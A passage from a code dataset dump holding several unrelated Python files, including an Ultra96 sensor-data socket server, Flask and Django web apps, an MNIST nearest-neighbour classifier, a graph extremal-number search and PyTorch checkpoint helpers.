MAX_LAPTOP_CONNECTIONS:\n print(f\"==== {MAX_LAPTOP_CONNECTIONS} Laptops have been connected with the Ultra96 ====\")\n break;\n else:\n print(f\"Warning: more than {MAX_LAPTOP_CONNECTIONS} connections are established\")\n break;\n print(\"end of init connections from laptop\")\n while True:\n time.sleep(10)\n\n \"\"\"\n One thread will be spawned with this method for each laptop connection.\n It will receive the data from the laptop and put it into a \n global queue shared by all such threads to house all data from laptops\n \"\"\"\n def receive_data_from_laptop(self, id, laptop_socket, laptop_addr):\n print(f\"thread {id} has started\")\n sql_data_dropper = 0\n while True:\n try:\n msg = laptop_socket.recv(512)\n curr_time = time.time()\n if (curr_time - 0 >= self.laptop1_connected_timing) and msg:\n full_msg = self.decrypt_message_from_laptop(msg)\n print(full_msg)\n # extract the data out here\n data_type = int(full_msg.split(\"|\")[1])\n if data_type == 0:\n packed_data = self.extract_and_pack_data_from_laptop(full_msg)\n self.laptop_data_queue.append(packed_data)\n self.data_collection_list.append(packed_data)\n self.laptop_data_map[id - 1].append(packed_data)\n #pack_for_sql_data = self.pack_data_for_sql(packed_data)\n if sql_data_dropper % 5 == 0:\n self.sql_data_queue.append(packed_data)\n # print(\"pushed data into sql queue\")\n # else:\n # print(\"----Data dropped for sql---\")\n sql_data_dropper += 1\n if not CONNECT_TO_EVAL_SERVER:\n print(f\"data received {id}: {packed_data}\")\n if msg.decode(\"utf-8\") == \"bluno_over\":\n print(f\"Closing the socket connection to {laptop_addr}\")\n break\n elif data_type == 1:\n positional_data = float(full_msg.split(\"|\")[2])\n self.laptop_positional_data_map[id - 1].append(positional_data)\n else:\n print(f\"Data type should never enter this state: {data_type}\")\n elif msg:\n print(\"dropped packet\")\n except Exception as e:\n print(\"=========\")\n print(f\"Exception has occurred in receiver thread {id}\")\n print(e)\n print(\"=========\")\n # direct data that are dance packets to this metho\n \n \"\"\"\n This function extracts the dance sensor values and packs it for shreyas AI\n Also, it updates the start timing in the dancer's time map\n \"\"\"\n def extract_and_pack_data_from_laptop(self, full_msg):\n data = full_msg.split(\"|\")\n laptop_id = data[0][1:]\n a_x = float(data[6])\n a_y = float(data[7])\n a_z = float(data[8])\n g_x = float(data[3])\n g_y = float(data[4])\n g_z = float(data[5])\n packet_marker = data[9]\n curr_time = data[2]\n if packet_marker == \"a\":\n if laptop_id in self.start_time_map_dancers:\n if self.start_time_map_dancers[laptop_id] == -1:\n self.start_time_map_dancers[laptop_id] = curr_time\n else:\n self.start_time_map_dancers[laptop_id] = curr_time\n return [g_x, g_y, g_z, a_x, a_y, a_z]\n\n def pack_data_for_sql(self, data):\n return (data[0], data[1], data[2], data[3], data[4], data[5], \"2008-11-11\", \"2008-11-11\")\n\n def decrypt_message_from_laptop(self, message):\n message = message.decode(\"utf-8\").strip()\n #message = message.strip()\n decoded_message = base64.b64decode(message)\n iv = decoded_message[:16]\n secret_key = bytes(LAPTOP_ULTRA96_SECRET_KEY, encoding=\"utf-8\")\n cipher = AES.new(secret_key, AES.MODE_CBC, iv)\n decrypted_message = cipher.decrypt(decoded_message[16:]).strip()\n decrypted_message = decrypted_message.decode(\"utf8\")\n return decrypted_message\n \n \"\"\"\n Cleans up resources\n Terminates the programme\n \"\"\"\n \n def stop(self):\n self.end = False;\n while True:\n if not self.end:\n time.sleep(3)\n else:\n break\n self.xilinx_socket.close();\n print(\"socket closed\");\n #self.socket.close()\n sys.exit()\n\ndef main():\n if len(sys.argv) != 3:\n print(\"Invalid number of arguments\")\n print('python ultra96_client.py [IP address] [Port]')\n sys.exit()\n \n ip_addr = sys.argv[1]\n port_num = int(sys.argv[2])\n\n ## connect to the evaluation server \n my_client = Ultra96_client(ip_addr, port_num)\n my_client.start()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"comms_external/helper/Debug1/u96.py","file_name":"u96.py","file_ext":"py","file_size_in_byte":9671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"487209242","text":"#!/usr/bin/python3\n\"\"\"Module\"\"\"\nfrom flask import Flask, render_template\nfrom models import storage\nfrom models.state import State\nfrom models.city import City\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef db_close(self):\n \"\"\"close session\"\"\"\n storage.close()\n\n\n@app.route('/hbnb_filters', strict_slashes=False)\ndef showFilters():\n states = storage.all('State')\n cities = storage.all('City')\n amenities = storage.all('Amenity')\n return render_template('10-hbnb_filters.html', states=states,\n cities=cities, amenities=amenities)\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', 5000)\n","sub_path":"web_flask/10-hbnb_filters.py","file_name":"10-hbnb_filters.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"127300575","text":"import csv\nfrom pprint import pprint\nimport datetime\n\n\n# def release_days(cast, dates, actors):\n\ndef release_days(cast, dates, actors):\n cast_lis = open(cast, newline='')\n cast_reader = csv.reader(cast_lis)\n cast_header = next(cast_reader)\n cast_data = [row for row in cast_reader]\n print(cast_header)\n titles = set()\n for ac in actors:\n name = ac.lower()\n for d in cast_data:\n if d[2].lower() == name:\n titles.add(d[0])\n # pprint(titles)\n\n # Data search by actor.\n # t_set = set()\n # for d in cast_data:\n # if d[2].lower() == 'meg ryan' or d[2].lower() == 'tom hanks':\n # # t_set.add(d[0])\n # print(d)\n # pprint(t_set)\n\n # Dates and shit.\n # Filter by USA releses.\n dates_lis = open(dates, newline='')\n dates_reader = csv.reader(dates_lis)\n dates_header = next(dates_reader)\n dates_data = [row for row in dates_reader]\n dat = []\n print(dates_header)\n for d in dates_data:\n if d[0] in titles and d[2] == 'USA':\n sdfg = d[3].split('-')\n ye, mo, da = sdfg\n dat.append(dict({d[0]: datetime.date(int(ye), int(mo), int(da))}))\n pprint(dat)\n # dick = dict()\n # for i in range(1, 8):\n # result = set()\n # for df in dat:\n # if wert.weekday() + 1 == i:\n # result.add(df.keys())\n # if len(result) > 0:\n # dick[i] = result\n # pprint(dick)\n\n # for i, df in enumerate(dat):\n # dic_lis = set()\n # ye, mo, da = df[1]\n # wert = datetime.date(int(ye), int(mo), int(da))\n # if wert.weekday() == i:\n # dic\n # dick.update({wert.weekday(): d[0]})\n # print(dick)\n # # print(ye, mo, da)\n\nprint(release_days(\n './data/cast.csv', './data/dates.csv', ['Tom Hanks', 'Meg Ryan']))\n# {2: {'Kate & Leopold'},\n# 3: {'A League of Their Own',\n# 'Catch Me If You Can',\n# 'Forrest Gump',\n# 'Innerspace',\n# 'Nothing in Common',\n# 'The Money Pit',\n# 'The Polar Express',\n# 'Toy Story',\n# 'Toy Story 2'},\n# 5: {'Addicted to Love',\n# 'Against the Ropes',\n# 'Amityville 3-D',\n# 'Anastasia',\n# 'Angels & Demons',\n# 'Apollo 13',\n# 'Armed and Dangerous',\n# 'Bachelor Party',\n# 'Big',\n# 'Bridge of Spies',\n# 'Captain Phillips',\n# 'Cars',\n# 'Cast Away',\n# \"Charlie Wilson's War\",\n# 'City of Angels',\n# 'Cloud Atlas',\n# 'Courage Under Fire',\n# 'D.O.A.',\n# 'Dragnet',\n# 'Extremely Loud & Incredibly Close',\n# 'Flesh and Bone',\n# 'French Kiss',\n# 'Hanging Up',\n# \"He Knows You're Alone\",\n# 'Hurlyburly',\n# 'In the Cut',\n# 'In the Land of Women',\n# \"Io sono l'amore\",\n# 'Joe Versus the Volcano',\n# 'Larry Crowne',\n# 'Philadelphia',\n# 'Prelude to a Kiss',\n# 'Proof of Life',\n# 'Punchline',\n# 'Radio Flyer',\n# 'Restoration',\n# 'Road to Perdition',\n# 'Saving Mr. Banks',\n# 'Saving Private Ryan',\n# 'Serious Moonlight',\n# 'Sleepless in Seattle',\n# 'Splash',\n# 'Sully',\n# 'That Thing You Do!',\n# \"The 'Burbs\",\n# 'The Bonfire of the Vanities',\n# 'The Da Vinci Code',\n# 'The Doors',\n# 'The Great Buck Howard',\n# 'The Green Mile',\n# 'The Ladykillers',\n# 'The Man with One Red Shoe',\n# 'The Presidio',\n# 'The Queen',\n# 'The Simpsons Movie',\n# 'The Terminal',\n# 'Top Gun',\n# 'Toy Story 3',\n# 'Turner & Hooch',\n# 'Volunteers',\n# 'When Harry Met Sally...',\n# 'When a Man Loves a Woman',\n# \"You've Got Mail\"},\n# 7: {'I.Q.'}}\n","sub_path":"prla/assignments/a2/release_days.py","file_name":"release_days.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"373089789","text":"import pandas as pd\nimport pyodbc\n\n# This line ensures that the connection closes after running the connection string\npyodbc.pooling = False\n\nclass SQLServer_connection:\n\n def __init__(self,sql_code):\n self.sql_code = sql_code\n\n def db_connect(self, run_date = None):\n self.run_date = run_date\n # parameters to pass to the connection string for connecting to the database\n connection_variables = {'DRIVER':'{SQL Server}',\n 'SERVER':'Insert server details',\n 'DATABASE':'database name',\n 'PWD':\"database password\",\n 'PORT':'port number',\n 'trusted_connection':'yes'}\n\n try:\n # connection string to be passed into pyodbc\n connection_string = ('DRIVER='+connection_variables['DRIVER']+';SERVER='+connection_variables['SERVER']+\n ';PORT='+connection_variables['PORT']+';DATABASE='+connection_variables['DATABASE']+\n ';trusted_connection='+connection_variables['trusted_connection']+';PWD='+connection_variables['PWD'])\n\n # open database connection using the connection string\n conn = pyodbc.connect(connection_string)\n\n if run_date != None:\n # if pull the data for a specified date\n # the date will be stored in the param variable\n # note that the date should be in the same format as stored in the database\n param = [self.run_date]\n data = pd.read_sql(self.sql_code,conn,params=param)\n # close connection\n conn.close()\n return data\n else:\n # cursor.execute(self.sql_code)\n # Fetch all the data\n # data = cursor.fetchall()\n data = pd.read_sql(self.sql_code,conn)\n # close connection\n conn.close()\n return print(data)\n except:\n print(\"Connection unsuccessful.\\n\"\n \"Check if you have entered the correct information for database connection string.\")\n\n\n\n#######################################################################################################################\n# Example of how to use the code #\n#######################################################################################################################\n\n# running the sql code without the date specified\n# Type your SQL code below\nsql_code = ('''SELECT *\\\n FROM INSERT_YOUR_TABLE_NAME\\\n WHERE INSERT_WHERE_CLAUSE\n ''')\nconnection = SQLServer_connection(sql_code)\ndata = connection.db_connect()\n\n# if you want to pull data for a specified date\nsql_code2 = ('''SELECT *\\\n FROM INSERT_YOUR_TABLE_NAME\\\n WHERE INSERT_WHERE_CLAUSE AND DATE_VARIABLE = CAST (? AS datetime)\n ''')\ndate_example = '2019/02/19'\n\nconnection = SQLServer_connection(sql_code2)\ndata2 = connection.db_connect(date_example)\n","sub_path":"pyodbc examples/sqlserver_pyodbc.py","file_name":"sqlserver_pyodbc.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"34775717","text":"import os\nimport glob\nimport torch\nimport torch.nn.parameter\nfrom datetime import datetime\nfrom gym import wrappers\n\n\ndef mkdir(path):\n \"\"\"if needed create a folder at given path\"\"\"\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n\n\ndef get_current_date_time():\n \"\"\"get current datetime as string in the form of Y_m_d_H_M_S\"\"\"\n current_date_time = datetime.now().strftime('%Y/%m/%d %H:%M:%S')\n current_date_time = current_date_time.replace(\" \", \"__\").replace(\"/\", \"_\").replace(\":\", \"_\")\n return current_date_time\n\n\ndef save_state_dict(checkpoint_dir, state_dict):\n \"\"\"Save the network weights\"\"\"\n mkdir(checkpoint_dir)\n current_date_time = get_current_date_time()\n torch.save(state_dict, os.path.join(checkpoint_dir, \"ckpt_\" + current_date_time))\n\n\ndef load_latest_available_state_dict(checkpoint_dir):\n list_of_files = glob.glob(checkpoint_dir)\n latest_file = max(list_of_files, key=os.path.getctime)\n return torch.load(latest_file)\n\n\ndef load_partial_state_dict(state_dict, target_state_dict):\n for name, param in state_dict.items():\n if name in target_state_dict:\n param = param.data\n target_state_dict[name].copy_(param)\n return state_dict\n\n\ndef set_up_monitoring(env, config):\n \"\"\"wrap the environment to allow rendering and set up a save directory\"\"\"\n path = os.path.join(\".\", *config[\"monitor_dir\"], config[\"env_name\"])\n mkdir(path)\n current_date_time = get_current_date_time()\n current_date_time = current_date_time.replace(\" \", \"__\").replace(\"/\", \"_\").replace(\":\", \"_\")\n env = wrappers.Monitor(env, os.path.join(path, current_date_time))\n return env\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"619614164","text":"import numpy as np\nimport collections\n\ndef train():\n with open(\"train-labels.idx1-ubyte\", mode='rb') as trainLabelFile:\n with open(\"train-images.idx3-ubyte\", mode=\"rb\") as trainImageFile:\n trainLabelFile.seek(4) # jump over the magic number\n trainImageFile.seek(4)\n s1 = trainLabelFile.read(4) # the amount of items\n s2 = trainImageFile.read(4)\n number = int.from_bytes(s1, byteorder=\"big\")\n\n number = int(number)\n print(number)\n rows = int.from_bytes(trainImageFile.read(4), byteorder=\"big\") # get rows and columns\n columns = int.from_bytes(trainImageFile.read(4), byteorder=\"big\")\n\n Images = [] # data struct to save the data\n Labels = []\n for i in range(0,number):\n Images.append(np.array([0]))\n Labels.append(0)\n\n for i in range(0, number): # get the data\n if i % 100 == 0:\n print(i)\n label = int.from_bytes(trainLabelFile.read(1), byteorder=\"big\")\n image = []\n for j in range(0, rows * columns):\n image.append(int.from_bytes(trainImageFile.read(1), byteorder=\"big\"))\n Labels[i] = label\n Images[i] = np.array(image)\n Images[i].shape = (28 * 28, 1)\n\n return(Labels,Images)\n\n\n\n\ndef test(Labels,Images):\n with open(\"t10k-images.idx3-ubyte\", mode=\"rb\") as testImageFile:\n with open(\"t10k-labels.idx1-ubyte\", mode=\"rb\") as testLabelFile:\n testLabelFile.seek(4) # jump over the magic number\n testImageFile.seek(4)\n s1 = testLabelFile.read(4) # the amount of items\n s2 = testImageFile.read(4)\n number = int.from_bytes(s1, byteorder=\"big\")\n\n number = int(number);\n rows = int.from_bytes(testImageFile.read(4), byteorder=\"big\") # get rows and columns\n columns = int.from_bytes(testImageFile.read(4), byteorder=\"big\")\n\n testImages = [] # data struct to save the data\n testLabels = []\n for i in range(0, number):\n testImages.append(np.array([0]))\n testLabels.append(0)\n\n for i in range(0, number): # get the data\n if i % 100 == 0:\n print(i)\n label = int.from_bytes(testLabelFile.read(1), byteorder=\"big\")\n image = []\n for j in range(0, rows * columns):\n image.append(int.from_bytes(testImageFile.read(1), byteorder=\"big\"))\n testLabels[i] = label\n testImages[i] = np.array(image)\n testImages[i].shape = (28 * 28, 1)\n\n\n resultFile = open(\"resultfile-3NN.txt\",mode=\"w+\",encoding=\"utf-8\")\n sameCount = 0\n\n for i in range(0,number):\n if i % 100 == 0:\n print(\"number: \"+str(i))\n finalResult=0\n firstThree = [float(\"inf\")]*3\n firstThreeLabel = [0]*3\n\n for j in range(0,len(Labels)):\n temp = np.linalg.norm(testImages[i]-Images[j])\n biggest,pos = find_biggest(firstThree)\n if tempbiggest:\n biggest=lst[i]\n pos=i\n return biggest,pos\n\ndef getPopular(lst):\n counter = collections.Counter(lst)\n most_common = counter.most_common(1)\n return most_common[0][0]\n\nif __name__ == \"__main__\":\n Labels,Images = train()\n test(Labels,Images)\n","sub_path":"homework2/编程作业/3NN.py","file_name":"3NN.py","file_ext":"py","file_size_in_byte":4087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"347042872","text":"from igraph import *\nfrom itertools import *\nfrom random import random\nimport math\n\n#Parameters for extremal calculation\nn = 8\nmtarget = 24\n#g is our test graph\ng = Graph(directed = True) \ng.add_vertices(n)\n#We can assume it contains a P_4\ng.add_edges([(0,1),(1,2),(2,3)])\n\ni = Graph(directed = True) #we compute ex(n,i)\ni.add_vertices(5)\ni.add_edges([(0,1),(1,2),(2,3),(3,4)]) #P_5\nj = Graph(directed = True)\nj.add_vertices(4)\nj.add_edges([(0,1),(1,2),(2,3),(3,0)]) #C_4\n#note that n should be >= 5 for the C_4-free assumption (for ex, for EX we need >= 9)\n\n#These are all the canidate edges\nedges = []\nfor x in permutations(range(0, n),2):\n edges.append(x)\nfor a in range(0,3):\n edges.remove((a, a+1))\nedges.remove((3,0)) #We can assume its C_4 free\nfor a in range(4,n):\n edges.remove((a,0))\n edges.remove((3,a)) #either of these make a P_5\n\n##loading bar code\n#numberofcanidateedges = len(edges)\n#numberofcombinations = math.factorial(numberofcanidateedges)/ (math.factorial(m-3) * math.factorial(numberofcanidateedges - m + 3))\n#a = 0\n#b = 0\n#c = 1000\n#\n##the checking loop\n#edgestobeadded = []\n#for x in combinations(edges, m - 3):\n# edgestobeadded = list(x)\n# g.add_edges(edgestobeadded)\n# # Checks if g has a copy of i using the vf2 algorithm\n# if not g.subisomorphic_vf2(i):\n# ifreegraphs.append(g.copy())\n# g.delete_edges(None)\n# g.add_edges([(0,1),(1,2),(2,3)])\n# a = a + 1\n# if a/numberofcombinations * c >= b:\n# print(b/c)\n# b = b + 1\n\n#data structures necessary to algorithm\ncheck = True\nifreegraphs = []\nifreeisos = [g]\nedgestoreverse = []\nl = Graph(directed = True)\nl.add_vertices(n)\nmaximalityedges = []\nkill = False\n\nfor m in range(3, mtarget + 1): \n print(\"Working on \", m)\n #remove duplicates up to isomorphism and converse\n ifreegraphs = list(set(ifreegraphs))\n print(\"Choosing representatives up to isomorphism for\", len(ifreegraphs), \"graphs\")\n check = True\n for h in ifreegraphs:\n for k in ifreeisos:\n if h.isomorphic(k):\n check = False\n if check:\n ifreeisos.append(h)\n check = True\n ifreegraphs = ifreeisos\n ifreeisos = []\n print(\"Clearing duality for\", len(ifreegraphs), \"graphs\")\n for h in ifreegraphs:\n for k in ifreeisos:\n l.add_edges([(b,a) for (a,b) in k.get_edgelist()])\n if h.isomorphic(k) or h.isomorphic(l):\n check = False\n l.delete_edges(None)\n if check:\n ifreeisos.append(h)\n check = True\n\n print(\"Now at\", len(ifreeisos),\"representatives\")\n\n #reset graphs for the next layer\n ifreegraphs = []\n if kill:\n ifreeisos = []\n \n #find the next layer\n for k in ifreeisos:\n maximalityedges = list(set(edges) - set(k.get_edgelist()))\n for e in maximalityedges:\n k.add_edges([e])\n if (not k.subisomorphic_vf2(i)) and (not k.subisomorphic_vf2(j)):\n ifreegraphs.append(k.copy())\n k.delete_edges([e])\n\n #reset the isos for the next layer\n if ifreegraphs:\n ifreeisos = []\n else:\n kill = True\n\n#print graphs\nfor h in ifreeisos:\n print(h)\nif ifreeisos:\n print(\"ex(\",n,\",P_5) =\",mtarget)\nelse:\n if kill:\n print(\"ex(\",n,\",P_5) <\", mtarget)\n else:\n print(\"ex(\",n,\",P_5) >\", mtarget)\n\n\n","sub_path":"p5-case/inductive-p5.py","file_name":"inductive-p5.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"619126582","text":"#coding=utf-8\n\n\nclass Solution(object):\n def intersection(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n set1 = set(nums1)\n set2 = set(nums2)\n\n return list(set1 & set2)\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.intersection([1, 2, 3, 2], [1, 3, 4]))\n\n\n\n","sub_path":"0349-Intersection of Two Arrays/python-0349/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"541659301","text":"'''\nCreated on Nov 2, 2013\n\n@author: shengeng\n'''\nfrom django.conf.urls import patterns, url\n\nfrom knowledge import views\n\nurlpatterns = patterns('',\n url(r'^add/$', views.KnowledgeFormView.as_view(success_url='/knowledge/add/')),\n url(r'^collect/',views.collectknowl, name='collectknowl'),\n url(r'^listcollect/',views.list_collection, name='list_collection'),\n url(r'^webview/$', views.web_view),\n url(r'^list/', views.list_knowledge, name='knowledge list view'),\n url(r'^cancel/',views.cancelknowl, name='cancelknowl'),\n)\n","sub_path":"knowledge/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"430182303","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/4/22 10:16\n# @Author : Hanwei Zhu\n# @File : environment.py\n\n\nclass GameEnv(object):\n def __init__(self, conf):\n self.conf = conf\n self._w = self.conf[\"sustain_weight\"]\n print(\"Game start!\")\n self.common_resource_pool = self.conf[\"resource_capacity_init\"]\n\n def growth_func(self, n):\n rg = self.conf[\"replenishment_rate\"]\n return rg * n * (1 - n / self.conf[\"resource_capacity_n_max\"])\n\n def harvest_func(self, effort, n):\n return self.conf[\"beta\"] * (effort ** self.conf[\"alpha\"]) * (n ** (1 - self.conf[\"alpha\"]))\n\n def reward_func(self, delta_n, pi_list):\n rewards = []\n\n if delta_n > 0:\n sustainability_goal = 1\n elif delta_n == 0:\n sustainability_goal = 0\n else:\n sustainability_goal = -1\n\n for pi in pi_list:\n if pi > 0:\n wealth_goal = 1\n elif pi == 0:\n wealth_goal = 0\n else:\n wealth_goal = -1\n r = self._w * sustainability_goal + (1 - self._w) * wealth_goal\n rewards.append(r)\n\n return rewards\n\n def step(self, efforts):\n\n effort_sum = sum(efforts)\n\n # interact with environment\n harvest_level = self.harvest_func(effort_sum, self.common_resource_pool)\n delta_n = int(self.growth_func(self.common_resource_pool) - harvest_level)\n self.common_resource_pool += delta_n\n\n # get feedback from env\n pi_list = list(map(lambda x: x / float(effort_sum) * harvest_level - self.conf[\"cost_c\"] * x, efforts))\n pi_sum = sum(pi_list)\n\n game_is_done = False\n if self.common_resource_pool <= 5.0:\n game_is_done = True\n\n next_states = []\n for index, (x, pi) in enumerate(zip(efforts, pi_list)):\n next_states.append([x, pi_list[index], effort_sum, pi_sum])\n\n return next_states, self.reward_func(delta_n, pi_list), game_is_done\n\n def reset(self):\n self.common_resource_pool = self.conf[\"resource_capacity_init\"]\n","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"588089741","text":"from flask import Flask, render_template, request, jsonify, url_for, json, redirect, make_response\nimport os\nimport requests\nfrom flask_sqlalchemy import SQLAlchemy\n\n# create flask app\napp = Flask(__name__)\n\n#setting up db config\nusername = \"todoflaskapp\"\npassword = \"todoflaskapp\"\nendpoint = \"todoflaskapp-db.cejj8nvffgy6.us-east-1.rds.amazonaws.com\"\ndb_instance_name = \"todoflaskapp-db\"\nuri = 'mysql://{}:{}@{}:3306/{}'.format(username, password, endpoint,db_instance_name)\napp.config['SQLALCHEMY_DATABASE_URI'] = uri\ndb = SQLAlchemy(app)\n\n@app.route('/')\ndef index():\n SITE_ROOT = os.path.realpath(os.path.dirname(__file__))\n json_url = os.path.join(SITE_ROOT, \"data\", \"data.json\")\n data = json.load(open(json_url))\n return render_template('index.html', todos=data)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n username = request.form['username']\n if username:\n url = 'https://hunter-todo-api.herokuapp.com/auth'\n payload = {\"username\":username}\n r = requests.post(url, json=payload)\n print(\"Retrieved Cookie: \", r.cookies)\n jar = r.cookies\n \n #if authenticated then get user's todo list\n if r.status_code == 200:\n todo_list = get_todo_list(jar)\n\n #store cookie to server \n response = make_response(render_template('index.html', username=username, todo_list=todo_list))\n key = 'sillyauth'\n val = r.cookies[key]\n #print(key, val)\n response.set_cookie(key, val)\n response.set_cookie('username', username)\n return response\n\n return render_template('login.html')\n\n@app.route('/logout')\ndef logout():\n return render_template('logout.html')\n\n@app.route('/createuser', methods=['GET', 'POST'])\ndef createUser():\n if request.method == 'POST':\n username = request.form['username']\n url = 'https://hunter-todo-api.herokuapp.com/user'\n payload = {'username': username}\n r = requests.post(url, json=payload)\n print(r.text)\n return render_template('login.html')\n return render_template('createUser.html')\n\n@app.route('/add', methods=['POST'])\ndef add():\n if request.method == 'POST':\n #retrieve stored cookie\n username = request.cookies.get('username')\n key = 'sillyauth'\n val = request.cookies.get(key)\n jar = requests.cookies.RequestsCookieJar()\n jar.set(key, val, domain='hunter-todo-api.herokuapp.com')\n \n #post the new item\n item = request.form['new_todo_item']\n #print(item)\n url = 'https://hunter-todo-api.herokuapp.com/todo-item'\n payload = {'content':item}\n r = requests.post(url, cookies=jar, json=payload)\n #print(r.status_code)\n\n #get updated todolist\n todo_list = get_todo_list(jar)\n\n #render index with new item\n if r.status_code == 201 and todo_list:\n return render_template('index.html', username=username, todo_list=todo_list)\n\n return render_template('login.html')\n \n@app.route('/completed', methods=['POST'])\ndef completed():\n if request.method == 'POST':\n #retrieve stored cookie\n username = request.cookies.get('username')\n #print(username)\n key = 'sillyauth'\n val = request.cookies.get(key)\n jar = requests.cookies.RequestsCookieJar()\n jar.set(key, val, domain='hunter-todo-api.herokuapp.com')\n #print(jar)\n\n #get item id\n if request.form.get('item_id'):\n item_id = request.form['item_id']\n print(\"item_id\", item_id)\n\n #mark item as completed\n url = 'https://hunter-todo-api.herokuapp.com/todo-item/' + item_id\n payload = {\"completed\":True}\n r = requests.put(url, json=payload, cookies=jar)\n\n #get updated todolist\n todo_list = get_todo_list(jar)\n\n return render_template('index.html', username=username, todo_list=todo_list)\n \n\n username = request.cookies.get('username')\n todo_list = get_todo_list(jar)\n return render_template('index.html', username=username, todo_list=todo_list)\n\n@app.route('/delete', methods=['POST'])\ndef delete():\n if request.method == 'POST':\n #retrieve stored cookie\n username = request.cookies.get('username')\n key = 'sillyauth'\n val = request.cookies.get(key)\n jar = requests.cookies.RequestsCookieJar()\n jar.set(key, val, domain='hunter-todo-api.herokuapp.com')\n \n #get item id\n if request.form.get('item_id'):\n item_id = request.form['item_id']\n #print(\"item_id\", item_id)\n\n #delete item\n url = 'https://hunter-todo-api.herokuapp.com/todo-item/' + item_id\n r = requests.delete(url, cookies=jar)\n\n #get updated todolist\n todo_list = get_todo_list(jar)\n\n return render_template('index.html', username=username, todo_list=todo_list)\n \n\n username = request.cookies.get('username')\n todo_list = get_todo_list(jar)\n return render_template('index.html', username=username, todo_list=todo_list)\n\ndef get_todo_list(cookie_jar):\n todo_items_url = 'https://hunter-todo-api.herokuapp.com/todo-item'\n r = requests.get(todo_items_url, cookies=cookie_jar)\n return r.json()\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host=\"0.0.0.0\", port=port, threaded=True, debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"519489218","text":"USERS = dict(\n # Twitter usernames\n paulweveritt=dict(\n id='paulweveritt',\n email='p@x.com',\n first_name='Firstie',\n last_name='Lastie',\n twitter='paulweveritt'\n ),\n stormfburg=dict(\n id='stormfburg',\n email='p@x.com',\n first_name='STORM',\n last_name='Fburg',\n twitter='stormfburg'\n )\n)","sub_path":"moonshot/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"38689734","text":"from django.http import HttpResponseForbidden\nfrom django.shortcuts import render, render_to_response,HttpResponse\nfrom .models import Message, Dialog\nfrom django.views import View\nfrom django.db.models import Q\nfrom notifications.models import Notification\n\n\ndef get_my_dialogs(request):\n\n return render_to_response('views/dialogs.html', {\n 'dialogs': Dialog.objects.filter(Q(owner=request.user) | Q(opponent=request.user))\n })\n\n\ndef create_dialog(request, opponent):\n user = request.user\n if not Dialog.objects.filter(Q(owner=user, opponent_id=opponent) | Q(owner_id=opponent, opponent=user)):\n Dialog.objects.create(owner=request.user, opponent_id=opponent)\n return render_to_response('views/dialogs.html', {\n 'dialogs': Dialog.objects.filter(Q(owner=request.user) | Q(opponent=request.user))\n })\n\n\nclass MessengerView(View):\n\n def get(self, request, dialog_id):\n dialog = Dialog.objects.get(id=dialog_id)\n if request.user == dialog.owner:\n unread_messages = Message.objects.filter(sender=dialog.opponent, read=False)\n else:\n unread_messages = Message.objects.filter(sender=dialog.owner, read=False)\n\n for unread_message in unread_messages:\n notification = Notification.objects.filter(recipient=request.user, actor_object_id=unread_message.id)\n for notif in notification:\n notif.delete()\n unread_message.read = True\n unread_message.save()\n\n return render_to_response('views/for_messanger.html', {\n 'dialog_id': dialog_id,\n 'messages': Message.objects.filter(dialog_id=dialog_id).order_by('id'),\n 'user': request.user,\n })\n\n def post(self, request):\n # msg = Message(dialog_id=request.POST['dialog_id'], sender=request.user, text=request.POST['message'])\n # msg.save()\n # return render_to_response('views/for_messanger.html', {\n # 'dialog_id': request.POST['dialog_id'],\n # 'messages': Message.objects.filter(dialog_id=request.POST['dialog_id']),\n # 'user': request.user,\n # })\n return HttpResponse('ds')","sub_path":"dialogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"80344139","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 13 15:01:43 2017\n\n@author: N1705165D\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nalpha = [0.1, 0.05, 0.02, 0.01, 0.0001]\n\ndef line_plot(benign_data, malware_data):\n ax = plt.subplot(111)\n for num in range(len(alpha)):\n ax.plot(benign_data[num], label = \"Benign with Confidence %s%%\" % ((1 - alpha[num]) * 100))\n 